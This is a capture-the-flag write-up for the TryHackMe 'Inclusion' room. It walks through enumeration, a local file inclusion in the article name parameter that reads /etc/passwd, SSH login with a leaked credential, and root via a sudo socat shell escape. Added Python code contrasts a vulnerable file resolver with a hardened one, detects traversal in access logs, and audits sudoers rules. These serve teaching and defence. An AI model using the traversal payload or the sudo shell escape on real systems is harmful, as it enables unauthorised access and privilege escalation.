TryHackMe: Inclusion
[Enumeration]
1. Port scan
nmap -Pn <ip>
2. High port scan
nmap -Pn -p1000- <ip>
Nothing useful.
3. OS and services scan
nmap -p 22,80 -A <ip>
4. Vulnerability scan
nmap -p 22,80 --script vuln <ip>
Nothing useful.
5. Browse the HTTP site on port 80
View the page source.
Explore all pages.
Try supplying values to any parameters found.
6. Directory discovery
gobuster dir --wordlist /usr/share/dirb/wordlists/common.txt -u http://<ip>/ -x php,txt,html
Nothing useful.
[Exploitation]
- LFI
The name parameter of "http://<ip>/article?name=" is vulnerable to local file inclusion: it can read /etc/passwd.
View the page source for easier reading.
There are two users with a login shell: root and falconfeast.
There is also a comment containing a credential: falconfeast:rootpassword
Try logging into SSH with that credential.
ssh falconfeast@<ip>
Success!!!
ls
cat user.txt
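The LFI above comes from an endpoint that turns a user-supplied name into a file path without restriction. The following Python is an added example, not code from the room or the lab application: it shows the vulnerable resolver beside a hardened one (allow-listed identifier plus a check that the resolved path stays under the content root), and a small detector that flags traversal or sensitive-file names in access-log request URIs. ARTICLE_ROOT, the ".txt" suffix and the log lines are constructed assumptions for the example.

```python
import os
import re
from typing import List, Optional

# Assumed content directory the article endpoint is meant to serve from.
ARTICLE_ROOT = "/var/www/articles"

def resolve_article_vulnerable(name: str) -> str:
    """Vulnerable pattern: the parameter is joined straight onto the root.
    A name like '../../../../etc/passwd' walks out of ARTICLE_ROOT."""
    return os.path.normpath(os.path.join(ARTICLE_ROOT, name))

# Only bare identifiers are accepted; no dots, slashes or encoded characters.
ALLOWED_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}$")

def resolve_article_hardened(name: str) -> Optional[str]:
    """Hardened: allow-list the identifier, append a fixed suffix, then confirm
    the real path is still inside ARTICLE_ROOT. Returns None on rejection."""
    if not ALLOWED_NAME.fullmatch(name):
        return None
    root = os.path.realpath(ARTICLE_ROOT)
    candidate = os.path.realpath(os.path.join(root, name + ".txt"))
    # Second line of defence: even a symlink inside the root must not escape it.
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate

# Detection: traversal sequences (plain or URL-encoded) and well-known
# sensitive paths appearing in the request URI.
TRAVERSAL = re.compile(r"(\.\./|\.\.%2f|%2e%2e/|%2e%2e%2f)", re.IGNORECASE)
SENSITIVE = re.compile(r"/etc/(passwd|shadow)|/proc/self", re.IGNORECASE)
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def flag_requests(log_lines: List[str]) -> List[str]:
    """Return the request URIs from combined-format access-log lines that
    contain traversal sequences or sensitive-file names."""
    hits = []
    for line in log_lines:
        m = REQUEST.search(line)
        if not m:
            continue
        uri = m.group(1)
        if TRAVERSAL.search(uri) or SENSITIVE.search(uri):
            hits.append(uri)
    return hits

# Constructed sample log lines (not from the lab host).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /article?name=hacking HTTP/1.1" 200 1234',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /article?name=../../../../etc/passwd HTTP/1.1" 200 2048',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /article?name=..%2f..%2fetc%2fpasswd HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    print("vulnerable ->", resolve_article_vulnerable("../../../../etc/passwd"))
    print("hardened   ->", resolve_article_hardened("../../../../etc/passwd"))
    print("hardened   ->", resolve_article_hardened("hacking"))
    for uri in flag_requests(SAMPLE_LOG):
        print("suspicious request:", uri)
```

The allow-list is the real fix; the realpath/commonpath check is there so that a future change (a symlink dropped into the content directory, a loosened regex) still cannot serve files outside the root. The log detector is deliberately narrow and will miss other encodings; treat it as a starting signature, not a complete rule.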
[Privilege escalation]
- sudo
sudo -l
socat is allowed via sudo.
Look it up on GTFOBins.
sudo socat stdin exec:/bin/sh
id
Now I'm root.
ls
cat root.txt
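The escalation works because a sudo rule lets an ordinary user run a binary that can spawn a shell. The Python below is an added example, not part of the room, of the audit a defender would run over sudoers rules to catch that class of misconfiguration: it parses each rule, strips tags such as NOPASSWD:, and flags unrestricted ALL grants and commands whose basename is a shell-capable binary. The SHELL_CAPABLE list is a short constructed subset of what GTFOBins documents, and SAMPLE_SUDOERS is a constructed file, not the lab host's real configuration.

```python
import os
import re
from typing import List, Tuple

# Constructed subset of binaries that GTFOBins documents as able to spawn a
# shell when run under sudo; extend it from the GTFOBins catalogue.
SHELL_CAPABLE = {"socat", "vim", "vi", "find", "awk", "python3",
                 "perl", "less", "env", "bash", "sh"}

# principal  host = (runas) [TAG:] command[, command ...]
RULE = re.compile(r"^(\S+)\s+(\S+)\s*=\s*(?:\(([^)]*)\)\s*)?(.+)$")
TAGS = ("NOPASSWD:", "PASSWD:", "SETENV:", "NOSETENV:", "EXEC:", "NOEXEC:")

def audit_sudoers(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (principal, command, reason) for every rule that grants ALL or
    a shell-capable binary. Comments, blank lines and Defaults are skipped."""
    findings = []
    for raw in lines:
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = RULE.match(line)
        if not m:
            continue
        principal, _host, _runas, cmd_spec = m.groups()
        nopasswd = False  # tags apply to the rest of the command list
        for cmd in cmd_spec.split(","):
            cmd = cmd.strip()
            while any(cmd.startswith(t) for t in TAGS):
                tag, cmd = cmd.split(":", 1)
                if tag == "NOPASSWD":
                    nopasswd = True
                elif tag == "PASSWD":
                    nopasswd = False
                cmd = cmd.strip()
            if not cmd:
                continue
            if cmd == "ALL":
                findings.append((principal, cmd, "unrestricted sudo"))
                continue
            binary = os.path.basename(cmd.split()[0])
            if binary in SHELL_CAPABLE:
                reason = "shell-capable binary" + (" without password" if nopasswd else "")
                findings.append((principal, cmd, reason))
    return findings

# Constructed sample sudoers content (not the lab host's real /etc/sudoers).
SAMPLE_SUDOERS = [
    "# constructed sample",
    "Defaults env_reset",
    "root ALL=(ALL:ALL) ALL",
    "%admin ALL=(ALL) ALL",
    "falconfeast ALL=(root) NOPASSWD: /usr/bin/socat",
    "backup ALL=(root) NOPASSWD: /usr/bin/rsync, /usr/bin/tar",
    "deploy ALL=(root) /usr/bin/systemctl restart app",
]

if __name__ == "__main__":
    for principal, cmd, reason in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{principal:12} {cmd:40} {reason}")
```

Run it over the output of `visudo -c -f` checked files or the contents of /etc/sudoers and /etc/sudoers.d/*. The rsync and tar rules in the sample are not flagged only because they are outside the short constructed list; in a real audit the list should be the full GTFOBins sudo section, and anything it flags should be replaced with a wrapper script that exposes just the needed operation.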